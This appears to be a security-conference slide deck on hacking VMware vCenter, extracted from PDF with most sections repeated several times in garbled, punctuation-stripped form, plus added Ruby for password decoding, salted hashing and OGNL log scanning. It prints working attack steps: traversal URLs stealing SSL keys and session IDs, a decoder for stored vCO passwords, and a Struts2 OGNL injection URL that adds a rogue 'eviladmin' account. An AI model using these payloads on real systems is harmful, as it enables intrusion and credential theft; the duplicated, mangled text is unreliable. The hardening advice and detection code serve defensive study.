FilesVMwareInfrastructureOrchestratorapp- serverservervmoconfpluginsVCxml
bull CProgram FilesVMwareInfrastructureOrchestratorapp-serverservervmoconfvmoproperties
VCxml
ltxml version=10 encoding=UTF-8 standalone=yesgt ltvirtual-infrastructure-hostsgt ltvirtual-infrastructure-host ltenabledgttrueltenabledgt lturlgthttpsnew-virtual-center-host443sdklturlgt ltadministrator-usernamegtvmwareltadministrator-
usernamegt ltadministrator-
passwordgt010506275767b74786b383a4a60be767864740329d5fcf324ec7fc98b1e0aaeef ltadministrator-passwordgt
ltpatterngtultpatterngt ltvirtual-infrastructure-hostgt ltvirtual-infrastructure-hostsgt
Password Encoding
006766e7964766a151e213a242665123568256c4031702d4c78454e5b575f60654b vmware 00776646771786a783922145215445b62322d1a2b5d6e196a6a712d712e24726079
vcenter bull Red bytes look like length bull Green bytes in ASCII range bull Black bytes random
Algorithm password Encoding
for (int i = 0 i lt nbDigits i++) int value = 0 if (i lt pwdlength()) value = pwdcharAt(i) Take i-th password symbol else value = Mathabs(rndnextInt() 100) Take random byte String toAdd = IntegertoHexString(value + i) i-th password symbol +
position of symbol resultappend(toAdd)
Password Decoder
len = (pass[02])to_i enc_pass = pass[3-1]scan(2) dec_pass = (0len)collect do |i| byte = enc_pass[i]to_i(16) byte -= i bytechr end
VMSA-2011-0005
bull VMware vCenter Orchestrator use Struts2 version 211 discovered by Digital Defense Inc
bull CVE-2010-1870 Struts2XWork remote command execution discovered by Meder Kydyraliev
bull Fixed in 42
CVE-2010-1870
bull OGNL ndash expression language for java bull Struts2 treat each HTTP parameter name as
OGNL statement httptargetloginactionpage[lsquologinrsquo]=user actiongetPage()setLanguage(ldquouserrdquo)
CVE-2010-1870
bull OGNL support bull Method calling foo() bull Static method
calling javalangSystemexit(1) bull Constructor calling new MyClass() bull Refer to variables foo = new MyClass() bull Context variables application session
context
CVE-2010-1870
bull Struts2 does not properly escape ldquordquo bull Could be bypass with unicode ldquou0023rdquo
bull 2 variables need to be set for RCE bull _memberAccess[allowStaticMethodAccess] bull context[xworkMethodAccessordenyMethodE
xecution]
CVE-2010-1870
bull Example exploit bull _memberAccess[allowStaticMethodAccess] =
true bull foo = new java langBoolean(false) bull context[xworkMethodAccessordenyMethodE
xecution] = foo bull rt = javalangRuntimegetRuntime() bull rtexec(lsquocalcexersquo)
CVE-2010-1870
bull Example exploit bull httptarget8282loginaction
(u0023_memberAccess[allowStaticMethodAccess])(meh)=trueamp(aaa)((u0023context[xworkMethodAccessordenyMethodExecution]u003du0023foo) (u0023foou003dnew javalangBoolean(false)))amp (asdf)((u0023rtexec(ldquonet user add eviladmin passWD123rdquo)) (u0023rtu003djavalangRuntimegetRuntime()))=1
Hardering
bull Update to latest version 42 update 4 or 5 bull Filter administration service services bull VMware vSphere Security Hardering Guide
Conclusions
bull Fixed bugs not always fixed in proper way bull One simple bug and we can own all
infrastructure bull Password must be stored in hash with salt or
encrypted
Thank you
aminozhenkodsecru al3xmin
- How to hack VMware vCenter server in 60 secondsAlexey Sintsov Alexander Minozhenko
- whoami
- ERPScan
- Target
- Target
- VMware vCenter Server
- CVE-2009-1523
- Directory traversalagain
- Directory traversal
- VASTO
- Slide Number 11
- Attack
- Attack
- Attack
- Vmware vCenter Orchestrator
- Slide Number 16
- We get in
- Plain text passwords
- Vmware vCenter Orchestrator
- VCxml
- Password Encoding
- Algorithm password Encoding
- Password Decoder
- VMSA-2011-0005
- CVE-2010-1870
- CVE-2010-1870
- CVE-2010-1870
- CVE-2010-1870
- CVE-2010-1870
- Hardering
- Conclusions
- Thank you
-
VMware vCenter Server
bull VMware vCenter Server is solution to manage VMware vSphere
CVE-2009-1523
bull Directory traversal in Jetty web server bull httptarget9084vcidownloadhealthxml3fFILE bull Discovered by Claudio Criscione bull But Fixed in VMware Update Manager 41 update 1 (
Directory traversalagain
bull Directory traversal in Jetty web server bull httptarget9084vcidownload5C5C5C5C5C
5C5C5CFILEEXT bull Discovered by Alexey Sintsov bull Metasploit module vmware_update_manager_traversalrb by
sinn3r
Directory traversal
bull What file to read bull Claudio Criscione propose to read vpxd-profiler- -
SessionStatsSessionPoolSessionId=06B90BCB-A0A4-4B9C-B680-FB72656A1DCBUsername=bdquoFakeDomainFakeUserSoapSessionId=AD45B176-63F3-4421-BBF0-FE1603E543F4Counttotal 1
bull Contains logs of SOAP requests with session ID
VASTO
bull ldquoVASTO ndash collection of Metasploit modules meant to be used as a testing tool to perform penetration tests or security audit of virtualization solutionsrdquo httpvastonibblesecorg
bull vmware_updatemanager_traversalrb Jetty path traversal bull vmware_session_riderrb
Local proxy to ride stolen SOAPID sessions
bull Fixed in version 41 update 1 bull contain ip - addresses
Attack
bull Make arp spoofing bull Spoof ssl certificate
Attack
bull Administrators check SSL cert
Attack
bull Steal ssl key via directory traversal httptarget9084vcidownloadsDocuments and SettingsAll
Users\Application Data\VMware\VMware VirtualCenter\SSL\rui.key
• Make ARP spoofing
• Decrypt traffic with the stolen SSL key
• What if ARP spoofing does not work?
VMware vCenter Orchestrator
• VMware vCO – software for automating configuration and management
• Installed by default with vCenter
• Has an interesting file: Program files\VMware\Infrastructure\Orchestrator\configuration\jetty\etc\passwd.properties
• Which contains an MD5 password hash without salt
• Could easily be brute-forced using rainbow tables or a GPU
We get in
Plain text passwords
VMware vCenter Orchestrator
• vCO stores passwords in files:
• C:\Program Files\VMware\Infrastructure\Orchestrator\app-server\server\vmo\conf\plugins\VC.xml
• C:\Program Files\VMware\Infrastructure\Orchestrator\app-server\server\vmo\conf\vmo.properties
VC.xml
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<virtual-infrastructure-hosts>
  <virtual-infrastructure-host>
    <enabled>true</enabled>
    <url>https://new-virtual-center-host:443/sdk</url>
    <administrator-username>vmware</administrator-username>
    <administrator-password>010506275767b74786b383a4a60be767864740329d5fcf324ec7fc98b1e0aaeef</administrator-password>
    <pattern>u</pattern>
  </virtual-infrastructure-host>
</virtual-infrastructure-hosts>
Password Encoding
006766e7964766a151e213a242665123568256c4031702d4c78454e5b575f60654b  =  vmware
00776646771786a783922145215445b62322d1a2b5d6e196a6a712d712e24726079  =  vcenter
• Red bytes look like the length
• Green bytes are in the ASCII range
• Black bytes are random
Password encoding algorithm
    // pwd: the password, nbDigits: total number of symbols to emit,
    // rnd: java.util.Random, result: StringBuilder collecting the hex output
    for (int i = 0; i < nbDigits; i++) {
        int value = 0;
        if (i < pwd.length())
            value = pwd.charAt(i);                 // take i-th password symbol
        else
            value = Math.abs(rnd.nextInt() % 100); // take random byte
        String toAdd = Integer.toHexString(value + i); // i-th password symbol + position of symbol
        result.append(toAdd);
    }
Password Decoder
    len      = pass[0..2].to_i            # three-digit decimal length prefix
    enc_pass = pass[3..-1].scan(/.{2}/)   # two hex digits per symbol
    dec_pass = (0...len).collect do |i|
      byte = enc_pass[i].to_i(16)
      byte -= i                           # undo the position offset
      byte.chr
    end.join
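The two slides above give the encoding loop and the decoder, and the passwd.properties slide together with the conclusions ask for salted hashing instead of what vCO does. The Ruby below is added here as an illustration and is not code from the slides or from VMware: it re-implements the scheme exactly as the slides describe it (three-digit decimal length prefix, hex(symbol + position) per character, random filler; the padding length VCO_NB_DIGITS is an assumption because nbDigits is not given), checks it against the two samples on the "Password Encoding" slide, and beside it shows the salted, slow-hash storage that a verify-only credential such as the Jetty admin account should use.

```ruby
require 'openssl'
require 'securerandom'

# Re-implementation of the VC.xml password obfuscation as the slides describe it.
# This is this page's illustration of the scheme, not VMware's code, and it
# assumes ASCII passwords like the slide samples.
VCO_NB_DIGITS = 32 # assumed padding length; nbDigits is not given on the slides

def vco_encode(pwd, nb_digits = VCO_NB_DIGITS, rng = Random.new)
  out = format('%03d', pwd.length)                       # length prefix, e.g. "006"
  nb_digits.times do |i|
    value = i < pwd.length ? pwd[i].ord : rng.rand(100)  # real symbol or random filler
    out << (value + i).to_s(16)                          # symbol value + its position
  end
  out
end

# Inverse of the scheme: read the length, then subtract the position from each
# two-digit hex value. No key is involved, so anyone who can read the file
# (for instance through the traversal bug) recovers the plaintext.
def vco_decode(blob)
  len = blob[0, 3].to_i
  pairs = blob[3..-1].scan(/.{2}/)
  (0...len).map { |i| (pairs[i].to_i(16) - i).chr }.join
end

# Samples copied from the "Password Encoding" slide, with the plaintext it pairs them with.
SLIDE_SAMPLES = {
  '006766e7964766a151e213a242665123568256c4031702d4c78454e5b575f60654b' => 'vmware',
  '00776646771786a783922145215445b62322d1a2b5d6e196a6a712d712e24726079' => 'vcenter'
}.freeze

# What the conclusions slide asks for instead, for a credential that only ever
# needs verifying: a per-entry random salt and a slow KDF, so a copied
# passwd.properties cannot be run through rainbow tables.
PBKDF2_ITERATIONS = 100_000

def hash_password(pwd, salt = SecureRandom.random_bytes(16))
  dk = OpenSSL::PKCS5.pbkdf2_hmac(pwd, salt, PBKDF2_ITERATIONS, 32, 'sha256')
  ['pbkdf2-sha256', PBKDF2_ITERATIONS, salt.unpack1('H*'), dk.unpack1('H*')].join('$')
end

def verify_password(pwd, stored)
  _scheme, iters, salt_hex, dk_hex = stored.split('$')
  dk = OpenSSL::PKCS5.pbkdf2_hmac(pwd, [salt_hex].pack('H*'), iters.to_i, 32, 'sha256')
  constant_time_equal?(dk, [dk_hex].pack('H*'))
end

# Compare without leaking where the first differing byte is.
def constant_time_equal?(a, b)
  return false unless a.bytesize == b.bytesize
  a.bytes.zip(b.bytes).reduce(0) { |acc, (x, y)| acc | (x ^ y) }.zero?
end

if __FILE__ == $PROGRAM_NAME
  SLIDE_SAMPLES.each do |blob, plain|
    puts "#{blob[0, 16]}... decodes to #{vco_decode(blob).inspect} (slide says #{plain})"
  end
  stored = hash_password('vmware')
  puts "salted record: #{stored}"
  puts "verify right password: #{verify_password('vmware', stored)}"
  puts "verify wrong password: #{verify_password('vcenter', stored)}"
end
```

Decoding the two slide samples returns the plaintexts the slide pairs them with, which is the whole point: the "encoding" is a fixed, keyless transform, so the VC.xml value is plaintext to anyone who can read the file. The PBKDF2 record, by contrast, differs on every call because of the salt, and a leaked record still has to be attacked one password guess at a time at 100,000 iterations each.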
VMSA-2011-0005
• VMware vCenter Orchestrator uses Struts2 version 2.1.1 (discovered by Digital Defense Inc.)
• CVE-2010-1870: Struts2/XWork remote command execution, discovered by Meder Kydyraliev
• Fixed in 4.2
CVE-2010-1870
• OGNL – expression language for Java
• Struts2 treats each HTTP parameter name as an OGNL statement:
  http://target/login.action?page['login']=user  →  action.getPage().setLanguage("user")
CVE-2010-1870
• OGNL supports:
• Method calling: foo()
• Static method calling: @java.lang.System@exit(1)
• Constructor calling: new MyClass()
• Referring to variables: #foo = new MyClass()
• Context variables: #application, #session, #context
CVE-2010-1870
• Struts2 does not properly escape "#"
• Could be bypassed with the unicode escape "\u0023"
• 2 variables need to be set for RCE:
• #_memberAccess['allowStaticMethodAccess']
• #context['xwork.MethodAccessor.denyMethodExecution']
CVE-2010-1870
• Example exploit:
• #_memberAccess['allowStaticMethodAccess'] = true
• #foo = new java.lang.Boolean(false)
• #context['xwork.MethodAccessor.denyMethodExecution'] = #foo
• #rt = @java.lang.Runtime@getRuntime()
• #rt.exec('calc.exe')
CVE-2010-1870
• Example exploit:
http://target:8282/login.action?(\u0023_memberAccess['allowStaticMethodAccess'])(meh)=true&(aaa)((\u0023context['xwork.MethodAccessor.denyMethodExecution']\u003d\u0023foo)(\u0023foo\u003dnew java.lang.Boolean(false)))&(asdf)((\u0023rt.exec("net user add eviladmin passWD123"))(\u0023rt\u003d@java.lang.Runtime@getRuntime()))=1
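The CVE-2010-1870 slides above come down to one parsing decision: a parameter name is evaluated as OGNL, and the "#" filter can be sidestepped with the \u0023 escape. The defender's counterpart is to whitelist what a parameter name may contain and to flag request lines that carry the tell-tale pieces. The Ruby below is an added illustration, not code from the slides or from Struts: a name whitelist modelled on the approach Struts took after this bug (the exact regex is this page's own choice, not the Struts source), plus a scanner that reports access-log request lines whose parameter names contain the "#" character, its \u0023 escape in raw or URL-encoded form, or the XWork objects named on the slides. The three log lines are constructed for the demonstration.

```ruby
require 'cgi'

# Parameter-name whitelist: identifier characters, dots, brackets, parentheses
# and quotes only. The pattern is this page's choice, not Struts' own. It leaves
# no way to write '#', a backslash escape, '@', '=' or whitespace, so the forms
# on the slides (#_memberAccess[...], \u0023..., @java.lang.Runtime@...) cannot
# be spelled inside a name at all.
SAFE_PARAM_NAME = /\A[a-zA-Z0-9.\[\]()_']+\z/

def safe_param_name?(name)
  SAFE_PARAM_NAME.match?(name)
end

# Substrings that do not belong in a parameter name of a Struts form, taken from
# the shape of the request on the slides: the raw '#', its unicode escape, the
# URL-encoded forms of both, and the XWork objects the technique has to touch.
OGNL_INDICATORS = [
  '#', '\\u0023', '%23', '%5cu0023', '_memberAccess',
  'allowStaticMethodAccess', 'denyMethodExecution', 'java.lang.Runtime'
].freeze

# Parameter names from one request line such as "GET /path?a=1&b=2 HTTP/1.1".
def param_names(request_line)
  target = request_line.split(' ')[1].to_s
  query = target.split('?', 2)[1].to_s
  query.split('&').map { |pair| pair.split('=', 2)[0].to_s }
end

# Indicators present in any parameter name, checked on the raw and the
# URL-decoded form, case-insensitively (%5C and %5c are the same byte).
def ognl_indicators(request_line)
  haystack = param_names(request_line)
             .flat_map { |n| [n, CGI.unescape(n)] }
             .join("\n").downcase
  OGNL_INDICATORS.select { |ind| haystack.include?(ind.downcase) }
end

# Scan an access log; returns [line_number, indicators] for every hit.
def scan_access_log(lines)
  lines.each_with_index.map do |line, idx|
    found = ognl_indicators(line)
    [idx + 1, found] unless found.empty?
  end.compact
end

# Constructed sample request lines (not a real log): the legitimate example
# from the slides, an ordinary form, and the first parameter of the slide's
# request URL-encoded the way a client would send it.
SAMPLE_LOG = [
  "GET /login.action?page['login']=user HTTP/1.1",
  'GET /login.action?username=alice&password=xyz HTTP/1.1',
  'GET /login.action?(%5Cu0023_memberAccess[%27allowStaticMethodAccess%27])(meh)=true HTTP/1.1'
].freeze

if __FILE__ == $PROGRAM_NAME
  scan_access_log(SAMPLE_LOG).each do |line_no, found|
    puts "line #{line_no}: #{found.join(', ')}"
  end
  SAMPLE_LOG.each do |line|
    verdict = param_names(line).all? { |n| safe_param_name?(n) } ? 'accept' : 'reject'
    puts "#{verdict}: #{line}"
  end
end
```

Only the third line is flagged, and it is also the only one the whitelist rejects; the slide's legitimate page['login'] parameter passes both checks because quotes and brackets stay allowed. The two checks complement each other: the whitelist belongs in front of the application (framework or WAF), the indicator scan is what to run over existing access logs to find out whether the shape on the slides has already been tried.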
Hardening
• Update to the latest version (4.2 update 4 or 5)
• Filter the administration services
• VMware vSphere Security Hardening Guide
Conclusions
• Fixed bugs are not always fixed in the proper way
• One simple bug and we can own the whole infrastructure
• Passwords must be stored as a hash with salt, or encrypted
Thank you
aminozhenko@dsec.ru, al3xmin
- How to hack VMware vCenter server in 60 secondsAlexey Sintsov Alexander Minozhenko
- whoami
- ERPScan
- Target
- Target
- VMware vCenter Server
- CVE-2009-1523
- Directory traversalagain
- Directory traversal
- VASTO
- Slide Number 11
- Attack
- Attack
- Attack
- Vmware vCenter Orchestrator
- Slide Number 16
- We get in
- Plain text passwords
- Vmware vCenter Orchestrator
- VCxml
- Password Encoding
- Algorithm password Encoding
- Password Decoder
- VMSA-2011-0005
- CVE-2010-1870
- CVE-2010-1870
- CVE-2010-1870
- CVE-2010-1870
- CVE-2010-1870
- Hardering
- Conclusions
- Thank you
-
CVE-2009-1523
bull Directory traversal in Jetty web server bull httptarget9084vcidownloadhealthxml3fFILE bull Discovered by Claudio Criscione bull But Fixed in VMware Update Manager 41 update 1 (
Directory traversalagain
bull Directory traversal in Jetty web server bull httptarget9084vcidownload5C5C5C5C5C
5C5C5CFILEEXT bull Discovered by Alexey Sintsov bull Metasploit module vmware_update_manager_traversalrb by
sinn3r
Directory traversal
bull What file to read bull Claudio Criscione propose to read vpxd-profiler- -
SessionStatsSessionPoolSessionId=06B90BCB-A0A4-4B9C-B680-FB72656A1DCBUsername=bdquoFakeDomainFakeUserSoapSessionId=AD45B176-63F3-4421-BBF0-FE1603E543F4Counttotal 1
bull Contains logs of SOAP requests with session ID
VASTO
bull ldquoVASTO ndash collection of Metasploit modules meant to be used as a testing tool to perform penetration tests or security audit of virtualization solutionsrdquo httpvastonibblesecorg
bull vmware_updatemanager_traversalrb Jetty path traversal bull vmware_session_riderrb
Local proxy to ride stolen SOAPID sessions
bull Fixed in version 41 update 1 bull contain ip - addresses
Attack
bull Make arp spoofing bull Spoof ssl certificate
Attack
bull Administrators check SSL cert
Attack
bull Steal ssl key via directory traversal httptarget9084vcidownloadsDocuments and SettingsAll
UsersApplication DataVMwareVMware VirtualCenterSSLruikey
bull Make arp-spoofing bull Decrypt traffic with stolen ssl key bull What if arp-spoofing does not work
Vmware vCenter Orchestrator
bull Vmware vCO ndash software for automate configuration and management
bull Install by default with vCenter bull Have interesting file Program filesVMwareInfrastructureOrchestratorconfigurationjettyetcpasswdproperties
bull Which contains md5 password without salt bull Could easy bruteforce using rainbow tables
GPU
We get in
Plain text passwords
Vmware vCenter Orchestrator
bull vCO stored password at files bull CProgram
FilesVMwareInfrastructureOrchestratorapp- serverservervmoconfpluginsVCxml
bull CProgram FilesVMwareInfrastructureOrchestratorapp-serverservervmoconfvmoproperties
VCxml
ltxml version=10 encoding=UTF-8 standalone=yesgt ltvirtual-infrastructure-hostsgt ltvirtual-infrastructure-host ltenabledgttrueltenabledgt lturlgthttpsnew-virtual-center-host443sdklturlgt ltadministrator-usernamegtvmwareltadministrator-
usernamegt ltadministrator-
passwordgt010506275767b74786b383a4a60be767864740329d5fcf324ec7fc98b1e0aaeef ltadministrator-passwordgt
ltpatterngtultpatterngt ltvirtual-infrastructure-hostgt ltvirtual-infrastructure-hostsgt
Password Encoding
006766e7964766a151e213a242665123568256c4031702d4c78454e5b575f60654b vmware 00776646771786a783922145215445b62322d1a2b5d6e196a6a712d712e24726079
vcenter bull Red bytes look like length bull Green bytes in ASCII range bull Black bytes random
Algorithm password Encoding
for (int i = 0 i lt nbDigits i++) int value = 0 if (i lt pwdlength()) value = pwdcharAt(i) Take i-th password symbol else value = Mathabs(rndnextInt() 100) Take random byte String toAdd = IntegertoHexString(value + i) i-th password symbol +
position of symbol resultappend(toAdd)
Password Decoder
len = (pass[02])to_i enc_pass = pass[3-1]scan(2) dec_pass = (0len)collect do |i| byte = enc_pass[i]to_i(16) byte -= i bytechr end
VMSA-2011-0005
bull VMware vCenter Orchestrator use Struts2 version 211 discovered by Digital Defense Inc
bull CVE-2010-1870 Struts2XWork remote command execution discovered by Meder Kydyraliev
bull Fixed in 42
CVE-2010-1870
bull OGNL ndash expression language for java bull Struts2 treat each HTTP parameter name as
OGNL statement httptargetloginactionpage[lsquologinrsquo]=user actiongetPage()setLanguage(ldquouserrdquo)
CVE-2010-1870
bull OGNL support bull Method calling foo() bull Static method
calling javalangSystemexit(1) bull Constructor calling new MyClass() bull Refer to variables foo = new MyClass() bull Context variables application session
context
CVE-2010-1870
bull Struts2 does not properly escape ldquordquo bull Could be bypass with unicode ldquou0023rdquo
bull 2 variables need to be set for RCE bull _memberAccess[allowStaticMethodAccess] bull context[xworkMethodAccessordenyMethodE
xecution]
CVE-2010-1870
bull Example exploit bull _memberAccess[allowStaticMethodAccess] =
true bull foo = new java langBoolean(false) bull context[xworkMethodAccessordenyMethodE
xecution] = foo bull rt = javalangRuntimegetRuntime() bull rtexec(lsquocalcexersquo)
CVE-2010-1870
bull Example exploit bull httptarget8282loginaction
(u0023_memberAccess[allowStaticMethodAccess])(meh)=trueamp(aaa)((u0023context[xworkMethodAccessordenyMethodExecution]u003du0023foo) (u0023foou003dnew javalangBoolean(false)))amp (asdf)((u0023rtexec(ldquonet user add eviladmin passWD123rdquo)) (u0023rtu003djavalangRuntimegetRuntime()))=1
Hardering
bull Update to latest version 42 update 4 or 5 bull Filter administration service services bull VMware vSphere Security Hardering Guide
Conclusions
bull Fixed bugs not always fixed in proper way bull One simple bug and we can own all
infrastructure bull Password must be stored in hash with salt or
encrypted
Thank you
aminozhenkodsecru al3xmin
- How to hack VMware vCenter server in 60 secondsAlexey Sintsov Alexander Minozhenko
- whoami
- ERPScan
- Target
- Target
- VMware vCenter Server
- CVE-2009-1523
- Directory traversalagain
- Directory traversal
- VASTO
- Slide Number 11
- Attack
- Attack
- Attack
- Vmware vCenter Orchestrator
- Slide Number 16
- We get in
- Plain text passwords
- Vmware vCenter Orchestrator
- VCxml
- Password Encoding
- Algorithm password Encoding
- Password Decoder
- VMSA-2011-0005
- CVE-2010-1870
- CVE-2010-1870
- CVE-2010-1870
- CVE-2010-1870
- CVE-2010-1870
- Hardering
- Conclusions
- Thank you
-
Directory traversalagain
bull Directory traversal in Jetty web server bull httptarget9084vcidownload5C5C5C5C5C
5C5C5CFILEEXT bull Discovered by Alexey Sintsov bull Metasploit module vmware_update_manager_traversalrb by
sinn3r
Directory traversal
bull What file to read bull Claudio Criscione propose to read vpxd-profiler- -
SessionStatsSessionPoolSessionId=06B90BCB-A0A4-4B9C-B680-FB72656A1DCBUsername=bdquoFakeDomainFakeUserSoapSessionId=AD45B176-63F3-4421-BBF0-FE1603E543F4Counttotal 1
bull Contains logs of SOAP requests with session ID
VASTO
bull ldquoVASTO ndash collection of Metasploit modules meant to be used as a testing tool to perform penetration tests or security audit of virtualization solutionsrdquo httpvastonibblesecorg
bull vmware_updatemanager_traversalrb Jetty path traversal bull vmware_session_riderrb
Local proxy to ride stolen SOAPID sessions
bull Fixed in version 41 update 1 bull contain ip - addresses
Attack
bull Make arp spoofing bull Spoof ssl certificate
Attack
bull Administrators check SSL cert
Attack
bull Steal ssl key via directory traversal httptarget9084vcidownloadsDocuments and SettingsAll
UsersApplication DataVMwareVMware VirtualCenterSSLruikey
bull Make arp-spoofing bull Decrypt traffic with stolen ssl key bull What if arp-spoofing does not work
Vmware vCenter Orchestrator
bull Vmware vCO ndash software for automate configuration and management
bull Install by default with vCenter bull Have interesting file Program filesVMwareInfrastructureOrchestratorconfigurationjettyetcpasswdproperties
bull Which contains md5 password without salt bull Could easy bruteforce using rainbow tables
GPU
We get in
Plain text passwords
Vmware vCenter Orchestrator
bull vCO stored password at files bull CProgram
FilesVMwareInfrastructureOrchestratorapp- serverservervmoconfpluginsVCxml
bull CProgram FilesVMwareInfrastructureOrchestratorapp-serverservervmoconfvmoproperties
VCxml
ltxml version=10 encoding=UTF-8 standalone=yesgt ltvirtual-infrastructure-hostsgt ltvirtual-infrastructure-host ltenabledgttrueltenabledgt lturlgthttpsnew-virtual-center-host443sdklturlgt ltadministrator-usernamegtvmwareltadministrator-
usernamegt ltadministrator-
passwordgt010506275767b74786b383a4a60be767864740329d5fcf324ec7fc98b1e0aaeef ltadministrator-passwordgt
ltpatterngtultpatterngt ltvirtual-infrastructure-hostgt ltvirtual-infrastructure-hostsgt
Password Encoding
006766e7964766a151e213a242665123568256c4031702d4c78454e5b575f60654b vmware 00776646771786a783922145215445b62322d1a2b5d6e196a6a712d712e24726079
vcenter bull Red bytes look like length bull Green bytes in ASCII range bull Black bytes random
Algorithm password Encoding
for (int i = 0 i lt nbDigits i++) int value = 0 if (i lt pwdlength()) value = pwdcharAt(i) Take i-th password symbol else value = Mathabs(rndnextInt() 100) Take random byte String toAdd = IntegertoHexString(value + i) i-th password symbol +
position of symbol resultappend(toAdd)
Password Decoder
len = (pass[02])to_i enc_pass = pass[3-1]scan(2) dec_pass = (0len)collect do |i| byte = enc_pass[i]to_i(16) byte -= i bytechr end
VMSA-2011-0005
bull VMware vCenter Orchestrator use Struts2 version 211 discovered by Digital Defense Inc
bull CVE-2010-1870 Struts2XWork remote command execution discovered by Meder Kydyraliev
bull Fixed in 42
CVE-2010-1870
bull OGNL ndash expression language for java bull Struts2 treat each HTTP parameter name as
OGNL statement httptargetloginactionpage[lsquologinrsquo]=user actiongetPage()setLanguage(ldquouserrdquo)
CVE-2010-1870
bull OGNL support bull Method calling foo() bull Static method
calling javalangSystemexit(1) bull Constructor calling new MyClass() bull Refer to variables foo = new MyClass() bull Context variables application session
context
CVE-2010-1870
bull Struts2 does not properly escape ldquordquo bull Could be bypass with unicode ldquou0023rdquo
bull 2 variables need to be set for RCE bull _memberAccess[allowStaticMethodAccess] bull context[xworkMethodAccessordenyMethodE
xecution]
CVE-2010-1870
bull Example exploit bull _memberAccess[allowStaticMethodAccess] =
true bull foo = new java langBoolean(false) bull context[xworkMethodAccessordenyMethodE
xecution] = foo bull rt = javalangRuntimegetRuntime() bull rtexec(lsquocalcexersquo)
CVE-2010-1870
bull Example exploit bull httptarget8282loginaction
(u0023_memberAccess[allowStaticMethodAccess])(meh)=trueamp(aaa)((u0023context[xworkMethodAccessordenyMethodExecution]u003du0023foo) (u0023foou003dnew javalangBoolean(false)))amp (asdf)((u0023rtexec(ldquonet user add eviladmin passWD123rdquo)) (u0023rtu003djavalangRuntimegetRuntime()))=1
Hardering
bull Update to latest version 42 update 4 or 5 bull Filter administration service services bull VMware vSphere Security Hardering Guide
Conclusions
bull Fixed bugs not always fixed in proper way bull One simple bug and we can own all
infrastructure bull Password must be stored in hash with salt or
encrypted
Thank you
aminozhenkodsecru al3xmin
- How to hack VMware vCenter server in 60 secondsAlexey Sintsov Alexander Minozhenko
- whoami
- ERPScan
- Target
- Target
- VMware vCenter Server
- CVE-2009-1523
- Directory traversalagain
- Directory traversal
- VASTO
- Slide Number 11
- Attack
- Attack
- Attack
- Vmware vCenter Orchestrator
- Slide Number 16
- We get in
- Plain text passwords
- Vmware vCenter Orchestrator
- VCxml
- Password Encoding
- Algorithm password Encoding
- Password Decoder
- VMSA-2011-0005
- CVE-2010-1870
- CVE-2010-1870
- CVE-2010-1870
- CVE-2010-1870
- CVE-2010-1870
- Hardering
- Conclusions
- Thank you
-
Directory traversal
bull What file to read bull Claudio Criscione propose to read vpxd-profiler- -
SessionStatsSessionPoolSessionId=06B90BCB-A0A4-4B9C-B680-FB72656A1DCBUsername=bdquoFakeDomainFakeUserSoapSessionId=AD45B176-63F3-4421-BBF0-FE1603E543F4Counttotal 1
bull Contains logs of SOAP requests with session ID
VASTO
bull ldquoVASTO ndash collection of Metasploit modules meant to be used as a testing tool to perform penetration tests or security audit of virtualization solutionsrdquo httpvastonibblesecorg
bull vmware_updatemanager_traversalrb Jetty path traversal bull vmware_session_riderrb
Local proxy to ride stolen SOAPID sessions
bull Fixed in version 41 update 1 bull contain ip - addresses
Attack
bull Make arp spoofing bull Spoof ssl certificate
Attack
bull Administrators check SSL cert
Attack
bull Steal ssl key via directory traversal httptarget9084vcidownloadsDocuments and SettingsAll
UsersApplication DataVMwareVMware VirtualCenterSSLruikey
bull Make arp-spoofing bull Decrypt traffic with stolen ssl key bull What if arp-spoofing does not work
Vmware vCenter Orchestrator
bull Vmware vCO ndash software for automate configuration and management
bull Install by default with vCenter bull Have interesting file Program filesVMwareInfrastructureOrchestratorconfigurationjettyetcpasswdproperties
bull Which contains md5 password without salt bull Could easy bruteforce using rainbow tables
GPU
We get in
Plain text passwords
Vmware vCenter Orchestrator
bull vCO stored password at files bull CProgram
FilesVMwareInfrastructureOrchestratorapp- serverservervmoconfpluginsVCxml
bull CProgram FilesVMwareInfrastructureOrchestratorapp-serverservervmoconfvmoproperties
VCxml
ltxml version=10 encoding=UTF-8 standalone=yesgt ltvirtual-infrastructure-hostsgt ltvirtual-infrastructure-host ltenabledgttrueltenabledgt lturlgthttpsnew-virtual-center-host443sdklturlgt ltadministrator-usernamegtvmwareltadministrator-
usernamegt ltadministrator-
passwordgt010506275767b74786b383a4a60be767864740329d5fcf324ec7fc98b1e0aaeef ltadministrator-passwordgt
ltpatterngtultpatterngt ltvirtual-infrastructure-hostgt ltvirtual-infrastructure-hostsgt
Password Encoding
006766e7964766a151e213a242665123568256c4031702d4c78454e5b575f60654b vmware 00776646771786a783922145215445b62322d1a2b5d6e196a6a712d712e24726079
vcenter bull Red bytes look like length bull Green bytes in ASCII range bull Black bytes random
Algorithm password Encoding
for (int i = 0 i lt nbDigits i++) int value = 0 if (i lt pwdlength()) value = pwdcharAt(i) Take i-th password symbol else value = Mathabs(rndnextInt() 100) Take random byte String toAdd = IntegertoHexString(value + i) i-th password symbol +
position of symbol resultappend(toAdd)
Password Decoder
len = (pass[02])to_i enc_pass = pass[3-1]scan(2) dec_pass = (0len)collect do |i| byte = enc_pass[i]to_i(16) byte -= i bytechr end
VMSA-2011-0005
bull VMware vCenter Orchestrator use Struts2 version 211 discovered by Digital Defense Inc
bull CVE-2010-1870 Struts2XWork remote command execution discovered by Meder Kydyraliev
bull Fixed in 42
CVE-2010-1870
bull OGNL ndash expression language for java bull Struts2 treat each HTTP parameter name as
OGNL statement httptargetloginactionpage[lsquologinrsquo]=user actiongetPage()setLanguage(ldquouserrdquo)
CVE-2010-1870
bull OGNL support bull Method calling foo() bull Static method
calling javalangSystemexit(1) bull Constructor calling new MyClass() bull Refer to variables foo = new MyClass() bull Context variables application session
context
CVE-2010-1870
bull Struts2 does not properly escape ldquordquo bull Could be bypass with unicode ldquou0023rdquo
bull 2 variables need to be set for RCE bull _memberAccess[allowStaticMethodAccess] bull context[xworkMethodAccessordenyMethodE
xecution]
CVE-2010-1870
bull Example exploit bull _memberAccess[allowStaticMethodAccess] =
true bull foo = new java langBoolean(false) bull context[xworkMethodAccessordenyMethodE
xecution] = foo bull rt = javalangRuntimegetRuntime() bull rtexec(lsquocalcexersquo)
CVE-2010-1870
bull Example exploit bull httptarget8282loginaction
